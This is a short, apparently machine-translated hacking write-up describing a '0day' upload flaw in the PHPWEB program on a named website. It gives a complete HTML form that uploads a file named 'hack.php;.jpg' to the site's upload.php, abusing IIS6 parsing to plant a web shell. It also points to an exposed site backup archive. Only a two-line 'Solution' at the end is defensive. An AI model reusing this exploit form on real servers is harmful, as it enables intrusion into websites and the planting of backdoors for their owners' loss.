Objectives:
Http://jzcs.51web.com/
Register a user first ..
Enter mutual Q &
Http://jzcs.51web.com/maq/class/
Upload now.
Directly construct a form locally so that any name of the uploaded file (the suffix must be jpg or something) can be parsed using IIS6. This is a 0day of PHPWEB. Many people know it ..
<Form name = "uploadForm" method = "post" enctype = "multipart/form-data" action = "http://jzcs.51web.com/maq/upload.php">
<Input type = "text" name = "fileName" value = "hack.php;.jpg"/>
<Input type = "hidden" name = "attachPath" value = "news/pics/"/>
<Input type = "file" name = "fileData" size = "14"/> </td>
<Input type = "submit" name = "button" value = "FUCK"/>
</Form>
Open locally and upload a fake image.
After submitting the form, you can see the cute Trojan address ..
Http://jzcs.51web.com/wwwroot.rar does not explain...
All Shenma members have it.
Solution:
1: Delete the website backup file in the root directory
2: php web vulnerability N many suggestions for changing the site. Do not use this program.